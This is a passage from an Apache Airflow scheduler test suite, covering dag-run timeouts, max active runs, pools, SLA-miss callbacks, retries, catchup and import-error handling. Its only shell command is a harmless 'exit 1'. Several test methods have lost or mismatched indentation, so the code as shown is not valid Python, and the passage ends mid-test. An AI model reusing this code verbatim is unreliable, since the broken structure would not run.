            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        # First run is created; a second is refused while the first is active.
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        dr = scheduler.create_dag_run(dag)
        self.assertIsNone(dr)
    def test_scheduler_fail_dagrun_timeout(self):
        """
        Test that a dagrun will be set to failed if it exceeds dagrun_timeout
        """
        dag = DAG(
            dag_id='test_scheduler_fail_dagrun_timeout',
            start_date=DEFAULT_DATE)
        dag.dagrun_timeout = datetime.timedelta(seconds=60)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        # Back-date the run so it is well past the 60s dagrun_timeout.
        dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
        session.merge(dr)
        session.commit()
        # Creating the next run should time out and fail the stale one.
        dr2 = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr2)
        dr.refresh_from_db(session=session)
        self.assertEquals(dr.state, State.FAILED)
    def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
        """
        Test that a dagrun will not be scheduled if max_dag_runs
        has been reached and dagrun_timeout is not reached

        Test that a dagrun will be scheduled if max_dag_runs has
        been reached but dagrun_timeout is also reached
        """
        dag = DAG(
            dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
            start_date=DEFAULT_DATE)
        dag.max_active_runs = 1
        dag.dagrun_timeout = datetime.timedelta(seconds=60)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        # Should not be scheduled as DagRun has not timedout and max_active_runs is reached
        new_dr = scheduler.create_dag_run(dag)
        self.assertIsNone(new_dr)
        # Should be scheduled as dagrun_timeout has passed
        dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
        session.merge(dr)
        session.commit()
        new_dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(new_dr)
    def test_scheduler_max_active_runs_respected_after_clear(self):
        """
        Test if _process_task_instances only schedules ti's up to max_active_runs
        (related to issue AIRFLOW-137)
        """
        dag = DAG(
            dag_id='test_scheduler_max_active_runs_respected_after_clear',
            start_date=DEFAULT_DATE)
        dag.max_active_runs = 3
        dag_task1 = DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag.clear()
        # First create up to 3 dagruns in RUNNING state.
        # NOTE(review): only one create_dag_run call is made here although the
        # comment above says "up to 3" — confirm whether two more calls were
        # dropped, as the "(should be one, not 3)" assertion below suggests.
        scheduler.create_dag_run(dag)
        # Reduce max_active_runs to 1
        dag.max_active_runs = 1
        queue = Mock()
        # and schedule them in, so we can check how many
        # tasks are put on the queue (should be one, not 3)
        scheduler._process_task_instances(dag, queue=queue)
        queue.append.assert_called_with(
            (dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
        )
    @patch.object(TI, 'pool_full')
    def test_scheduler_verify_pool_full(self, mock_pool_full):
        """
        Test task instances not queued when pool is full
        """
        # Pretend the pool is never full at ti level so scheduling proceeds
        # and the slot-limit check in _execute_task_instances is what gates.
        mock_pool_full.return_value = False
        dag = DAG(
            dag_id='test_scheduler_verify_pool_full',
            start_date=DEFAULT_DATE)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow',
            pool='test_scheduler_verify_pool_full')
        session = settings.Session()
        # A pool with a single slot.
        pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
        session.add(pool)
        orm_dag = DagModel(dag_id=dag.dag_id)
        orm_dag.is_paused = False
        session.merge(orm_dag)
        session.commit()
        scheduler = SchedulerJob()
        dag.clear()
        # Create 2 dagruns, which will create 2 task instances.
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        self.assertEquals(dr.execution_date, DEFAULT_DATE)
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        queue = []
        scheduler._process_task_instances(dag, queue=queue)
        self.assertEquals(len(queue), 2)
        dagbag = self._make_simple_dag_bag([dag])
        # Recreated part of the scheduler here, to kick off tasks -> executor
        for ti_key in queue:
            task = dag.get_task(ti_key[1])
            ti = TI(task, ti_key[2])
            # Task starts out in the scheduled state. All tasks in the
            # scheduled state will be sent to the executor
            ti.state = State.SCHEDULED
            # Also save this task instance to the DB.
            session.merge(ti)
            session.commit()
        scheduler._execute_task_instances(dagbag,
                                          (State.SCHEDULED,
                                           State.UP_FOR_RETRY))
        # Only one of the two tis fits in the single pool slot.
        self.assertEquals(len(scheduler.executor.queued_tasks), 1)
    def test_scheduler_auto_align(self):
        """
        Test if the schedule_interval will be auto aligned with the start_date
        such that if the start_date coincides with the schedule the first
        execution_date will be start_date, otherwise it will be start_date +
        interval.
        """
        # Case 1: start_date (10:10) does NOT coincide with the cron
        # "4 5 * * *", so the first run aligns to the next slot (next day 05:04).
        dag = DAG(
            dag_id='test_scheduler_auto_align_1',
            start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
            schedule_interval="4 5 * * *"
        )
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
        # Case 2: start_date (10:10) coincides with the cron "10 10 * * *",
        # so the first execution_date is the start_date itself.
        dag = DAG(
            dag_id='test_scheduler_auto_align_2',
            start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
            schedule_interval="10 10 * * *"
        )
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        scheduler = SchedulerJob()
        dag.clear()
        dr = scheduler.create_dag_run(dag)
        self.assertIsNotNone(dr)
        self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
    def test_scheduler_reschedule(self):
        """
        Checks if tasks that are not taken up by the executor
        get rescheduled
        """
        executor = TestExecutor()
        dagbag = DagBag(executor=executor)
        dagbag.dags.clear()
        dagbag.executor = executor
        dag = DAG(
            dag_id='test_scheduler_reschedule',
            start_date=DEFAULT_DATE)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        dag.clear()
        dag.is_subdag = False
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        orm_dag.is_paused = False
        session.merge(orm_dag)
        session.commit()
        dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

        @mock.patch('airflow.models.DagBag', return_value=dagbag)
        @mock.patch('airflow.models.DagBag.collect_dags')
        def do_schedule(function, function2):
            # Use a empty file since the above mock will return the
            # expected DAGs. Also specify only a single file so that it doesn't
            # try to schedule the above DAG repeatedly.
            scheduler = SchedulerJob(num_runs=1,
                                     executor=executor,
                                     subdir=os.path.join(settings.DAGS_FOLDER,
                                                         "no_dags.py"))
            scheduler.heartrate = 0
            scheduler.run()

        # First pass queues the single ti; TestExecutor never runs it.
        do_schedule()
        self.assertEquals(1, len(executor.queued_tasks))
        executor.queued_tasks.clear()
        # After the queue is dropped, the scheduler must re-queue the ti
        # plus the next run's ti.
        do_schedule()
        self.assertEquals(2, len(executor.queued_tasks))
    def test_scheduler_sla_miss_callback(self):
        """
        Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
        """
        session = settings.Session()
        # Mock the callback function so we can verify that it was not called
        sla_callback = MagicMock()
        # Create dag with a start of 2 days ago, but an sla of 1 day
        # ago so we'll already have an sla_miss on the books
        test_start_date = days_ago(2)
        dag = DAG(dag_id='test_sla_miss',
                  sla_miss_callback=sla_callback,
                  default_args={'start_date': test_start_date,
                                'sla': datetime.timedelta(days=1)})
        task = DummyOperator(task_id='dummy',
                             dag=dag,
                             owner='airflow')
        # Create a TaskInstance for two days ago
        session.merge(models.TaskInstance(task=task,
                                          execution_date=test_start_date,
                                          state='success'))
        # Create an SlaMiss where notification was sent, but email was not
        session.merge(models.SlaMiss(task_id='dummy',
                                     dag_id='test_sla_miss',
                                     execution_date=test_start_date,
                                     email_sent=False,
                                     notification_sent=True))
        # Now call manage_slas and see if the sla_miss callback gets called
        scheduler = SchedulerJob(dag_id='test_sla_miss',
                                 num_runs=1)
        scheduler.manage_slas(dag=dag, session=session)
        # notification_sent=True above means the callback must be skipped.
        sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
    def test_retry_still_in_executor(self):
        """
        Checks if the scheduler does not put a task in limbo, when a task is retried
        but is still present in the executor.
        """
        executor = TestExecutor()
        dagbag = DagBag(executor=executor)
        dagbag.dags.clear()
        dagbag.executor = executor
        dag = DAG(
            dag_id='test_retry_still_in_executor',
            start_date=DEFAULT_DATE,
            schedule_interval="@once")
        dag_task1 = BashOperator(
            task_id='test_retry_handling_op',
            bash_command='exit 1',
            retries=1,
            dag=dag,
            owner='airflow')
        dag.clear()
        dag.is_subdag = False
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        orm_dag.is_paused = False
        session.merge(orm_dag)
        session.commit()
        dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

        @mock.patch('airflow.models.DagBag', return_value=dagbag)
        @mock.patch('airflow.models.DagBag.collect_dags')
        def do_schedule(function, function2):
            # Use a empty file since the above mock will return the
            # expected DAGs. Also specify only a single file so that it doesn't
            # try to schedule the above DAG repeatedly.
            scheduler = SchedulerJob(num_runs=1,
                                     executor=executor,
                                     subdir=os.path.join(settings.DAGS_FOLDER,
                                                         "no_dags.py"))
            scheduler.heartrate = 0
            scheduler.run()

        do_schedule()
        self.assertEquals(1, len(executor.queued_tasks))

        def run_with_error(task):
            # The bash task exits 1, so running it raises AirflowException.
            try:
                task.run()
            except AirflowException:
                pass

        # Pull the queued ti back out of the executor to run it by hand.
        ti_tuple = six.next(six.itervalues(executor.queued_tasks))
        (command, priority, queue, simple_ti) = ti_tuple
        ti = simple_ti.construct_task_instance()
        ti.task = dag_task1
        self.assertEqual(ti.try_number, 1)
        # fail execution
        run_with_error(ti)
        self.assertEqual(ti.state, State.UP_FOR_RETRY)
        self.assertEqual(ti.try_number, 2)
        ti.refresh_from_db(lock_for_update=True, session=session)
        ti.state = State.SCHEDULED
        session.merge(ti)
        session.commit()
        # do not schedule
        do_schedule()
        self.assertTrue(executor.has_task(ti))
        ti.refresh_from_db()
        # removing self.assertEqual(ti.state, State.SCHEDULED)
        # as scheduler will move state from SCHEDULED to QUEUED
        # now the executor has cleared and it should be allowed the re-queue,
        # but tasks stay in the executor.queued_tasks after executor.heartbeat()
        # will be set back to SCHEDULED state
        executor.queued_tasks.clear()
        do_schedule()
        ti.refresh_from_db()
        self.assertEqual(ti.state, State.SCHEDULED)
        # To verify that task does get re-queued.
        executor.queued_tasks.clear()
        executor.do_update = True
        do_schedule()
        ti.refresh_from_db()
        self.assertEqual(ti.state, State.RUNNING)
    @unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
    def test_retry_handling_job(self):
        """
        Integration test of the scheduler not accidentally resetting
        the try_numbers for a task
        """
        dag = self.dagbag.get_dag('test_retry_handling_job')
        dag_task1 = dag.get_task("test_retry_handling_op")
        dag.clear()
        scheduler = SchedulerJob(dag_id=dag.dag_id,
                                 num_runs=1)
        scheduler.heartrate = 0
        scheduler.run()
        session = settings.Session()
        ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
                                      TI.task_id == dag_task1.task_id).first()
        # make sure the counter has increased
        self.assertEqual(ti.try_number, 2)
        self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
# 5s to wait for child process to exit, 1s dummy sleep
# in scheduler loop to prevent excessive logs and 1s for last loop to finish.
self.assertLess(run_duration - expected_run_duration, 6.0)
    def test_dag_with_system_exit(self):
        """
        Test to check that a DAG with a system.exit() doesn't break the scheduler.
        """
        dag_id = 'exit_test_dag'
        dag_ids = [dag_id]
        dag_directory = os.path.join(settings.DAGS_FOLDER,
                                     "..",
                                     "dags_with_system_exit")
        dag_file = os.path.join(dag_directory,
                                'b_test_scheduler_dags.py')
        dagbag = DagBag(dag_folder=dag_file)
        for dag_id in dag_ids:
            dag = dagbag.get_dag(dag_id)
            dag.clear()
        scheduler = SchedulerJob(dag_ids=dag_ids,
                                 subdir=dag_directory,
                                 num_runs=1)
        scheduler.run()
        # Despite sibling files calling sys.exit(), the target DAG's single
        # task must still have been scheduled and recorded.
        with create_session() as session:
            self.assertEqual(
                len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
    def test_dag_get_active_runs(self):
        """
        Test to check that a DAG returns its active runs
        """
        now = timezone.utcnow()
        # Align to an exact hour so the '* * * * *' schedule has a clean slot.
        six_hours_ago_to_the_hour = \
            (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
        START_DATE = six_hours_ago_to_the_hour
        DAG_NAME1 = 'get_active_runs_test'
        default_args = {
            'owner': 'airflow',
            'depends_on_past': False,
            'start_date': START_DATE
        }
        dag1 = DAG(DAG_NAME1,
                   schedule_interval='* * * * *',
                   max_active_runs=1,
                   default_args=default_args
                   )
        # Linear chain: run_this_1 -> run_this_2 -> run_this_3.
        run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
        run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
        run_this_2.set_upstream(run_this_1)
        run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
        run_this_3.set_upstream(run_this_2)
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag1.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        scheduler = SchedulerJob()
        dag1.clear()
        dr = scheduler.create_dag_run(dag1)
        # We had better get a dag run
        self.assertIsNotNone(dr)
        execution_date = dr.execution_date
        running_dates = dag1.get_active_runs()
        try:
            running_date = running_dates[0]
        except Exception as _:
            # Sentinel value so the assertion below fails with a clear message.
            running_date = 'Except'
        self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
    def test_dag_catchup_option(self):
        """
        Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
        """

        def setup_dag(dag_id, schedule_interval, start_date, catchup):
            # Build a 3-task linear DAG and register it in the metadata DB.
            default_args = {
                'owner': 'airflow',
                'depends_on_past': False,
                'start_date': start_date
            }
            dag = DAG(dag_id,
                      schedule_interval=schedule_interval,
                      max_active_runs=1,
                      catchup=catchup,
                      default_args=default_args)
            t1 = DummyOperator(task_id='t1', dag=dag)
            t2 = DummyOperator(task_id='t2', dag=dag)
            t2.set_upstream(t1)
            t3 = DummyOperator(task_id='t3', dag=dag)
            t3.set_upstream(t2)
            session = settings.Session()
            orm_dag = DagModel(dag_id=dag.dag_id)
            session.merge(orm_dag)
            session.commit()
            session.close()
            return dag
        now = timezone.utcnow()
        six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
            minute=0, second=0, microsecond=0)
        half_an_hour_ago = now - datetime.timedelta(minutes=30)
        two_hours_ago = now - datetime.timedelta(hours=2)
        scheduler = SchedulerJob()
        dag1 = setup_dag(dag_id='dag_with_catchup',
                         schedule_interval='* * * * *',
                         start_date=six_hours_ago_to_the_hour,
                         catchup=True)
        # Sanity-check that catchup defaults to True via config.
        default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
        self.assertEqual(default_catchup, True)
        self.assertEqual(dag1.catchup, True)
        dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
                         schedule_interval='*/10 * * * *',
                         start_date=six_hours_ago_to_the_hour,
                         catchup=False)
        dr = scheduler.create_dag_run(dag2)
        # We had better get a dag run
        self.assertIsNotNone(dr)
        # The DR should be scheduled in the last half an hour, not 6 hours ago
        self.assertGreater(dr.execution_date, half_an_hour_ago)
        # The DR should be scheduled BEFORE now
        self.assertLess(dr.execution_date, timezone.utcnow())
        dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
                         schedule_interval='@hourly',
                         start_date=six_hours_ago_to_the_hour,
                         catchup=False)
        dr = scheduler.create_dag_run(dag3)
        # We had better get a dag run
        self.assertIsNotNone(dr)
        # The DR should be scheduled in the last 2 hours, not 6 hours ago
        self.assertGreater(dr.execution_date, two_hours_ago)
        # The DR should be scheduled BEFORE now
        self.assertLess(dr.execution_date, timezone.utcnow())
        dag4 = setup_dag(dag_id='dag_without_catchup_once',
                         schedule_interval='@once',
                         start_date=six_hours_ago_to_the_hour,
                         catchup=False)
        # @once DAGs get exactly one run regardless of catchup.
        dr = scheduler.create_dag_run(dag4)
        self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
    def test_add_unparseable_file_after_sched_start_creates_import_error(self):
        """A file that becomes unparseable after the scheduler has already
        seen the folder must still produce one ImportError row."""
        dags_folder = mkdtemp()
        try:
            unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
            # First loop runs against an empty folder ...
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
            # ... then the broken file appears and a second loop picks it up.
            with open(unparseable_filename, 'w') as unparseable_file:
                unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
        finally:
            shutil.rmtree(dags_folder)
        with create_session() as session:
            import_errors = session.query(models.ImportError).all()
            self.assertEqual(len(import_errors), 1)
            import_error = import_errors[0]
            self.assertEqual(import_error.filename,
                             unparseable_filename)
            self.assertEqual(import_error.stacktrace,
                             "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
    def test_new_import_error_replaces_old(self):
        """Re-parsing a still-broken file must replace, not duplicate, its
        ImportError row (and reflect the new error location)."""
        try:
            dags_folder = mkdtemp()
            unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
            # Generate original import error
            with open(unparseable_filename, 'w') as unparseable_file:
                unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
            # Generate replacement import error (the error will be on the second line now)
            with open(unparseable_filename, 'w') as unparseable_file:
                unparseable_file.writelines(
                    PARSEABLE_DAG_FILE_CONTENTS +
                    os.linesep +
                    UNPARSEABLE_DAG_FILE_CONTENTS)
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
        finally:
            shutil.rmtree(dags_folder)
        session = settings.Session()
        import_errors = session.query(models.ImportError).all()
        # Still exactly one row, now pointing at line 2.
        self.assertEqual(len(import_errors), 1)
        import_error = import_errors[0]
        self.assertEqual(import_error.filename,
                         unparseable_filename)
        self.assertEqual(import_error.stacktrace,
                         "invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
    def test_remove_error_clears_import_error(self):
        """Fixing a previously broken file must delete its ImportError row."""
        try:
            dags_folder = mkdtemp()
            filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
            # Generate original import error
            with open(filename_to_parse, 'w') as file_to_parse:
                file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
            # Remove the import error from the file
            with open(filename_to_parse, 'w') as file_to_parse:
                file_to_parse.writelines(
                    PARSEABLE_DAG_FILE_CONTENTS)
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
        finally:
            shutil.rmtree(dags_folder)
        session = settings.Session()
        import_errors = session.query(models.ImportError).all()
        self.assertEqual(len(import_errors), 0)
    def test_remove_file_clears_import_error(self):
        """Deleting a broken file must delete its ImportError row on the
        next scheduler pass."""
        try:
            dags_folder = mkdtemp()
            filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
            # Generate original import error
            with open(filename_to_parse, 'w') as file_to_parse:
                file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
            self.run_single_scheduler_loop_with_no_dags(dags_folder)
        finally:
            shutil.rmtree(dags_folder)
        # Rerun the scheduler once the dag file has been removed
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
        with create_session() as session:
            import_errors = session.query(models.ImportError).all()
            self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
    def test_reset_orphaned_tasks_external_triggered_dag(self):
        """SCHEDULED tis of an externally triggered RUNNING dagrun are reset."""
        dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
        task_id = dag_id + '_task'
        DummyOperator(task_id=task_id, dag=dag)
        scheduler = SchedulerJob()
        session = settings.Session()
        dr1 = scheduler.create_dag_run(dag, session=session)
        ti = dr1.get_task_instances(session=session)[0]
        # A SCHEDULED ti inside a RUNNING, externally triggered run is orphaned.
        dr1.state = State.RUNNING
        ti.state = State.SCHEDULED
        dr1.external_trigger = True
        session.merge(ti)
        session.merge(dr1)
        session.commit()
        reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
        self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
    """Task instances belonging to a backfill dagrun must not be reset."""
    dag_id = 'test_reset_orphaned_tasks_backfill_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    ti.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # a BackfillJob-style run_id marks the dagrun as a backfill
    dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
    session.merge(ti)
    session.merge(dr1)
    session.commit()

    self.assertTrue(dr1.is_backfill)
    # assertEquals is a deprecated alias of assertEqual
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
    """Try to reset when we specify a dagrun and ensure nothing else is."""
    dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    # make two dagruns, only reset for one
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.SUCCESS
    dr2.state = State.RUNNING
    ti1 = dr1.get_task_instances(session=session)[0]
    ti2 = dr2.get_task_instances(session=session)[0]
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(dr1)
    session.merge(dr2)
    session.commit()

    reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
    # assertEquals is a deprecated alias of assertEqual
    self.assertEqual(1, len(reset_tis))
    ti1.refresh_from_db(session=session)
    ti2.refresh_from_db(session=session)
    # only the task of the filtered dagrun (dr2) was reset to NONE
    self.assertEqual(State.SCHEDULED, ti1.state)
    self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
    """Make sure a task in an orphaned state is not reset if it has no dagrun. """
    dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    task = DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    # create a task instance directly, without any dagrun backing it
    ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
    session.add(ti)
    session.commit()

    ti.refresh_from_db()
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()

    # assertEquals is a deprecated alias of assertEqual
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
    """A RUNNING task in a RUNNING dagrun is not an orphan and stays RUNNING."""
    dag_id = 'test_reset_orphaned_tasks_no_orphans'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    tis = dr1.get_task_instances(session=session)
    tis[0].state = State.RUNNING
    session.merge(dr1)
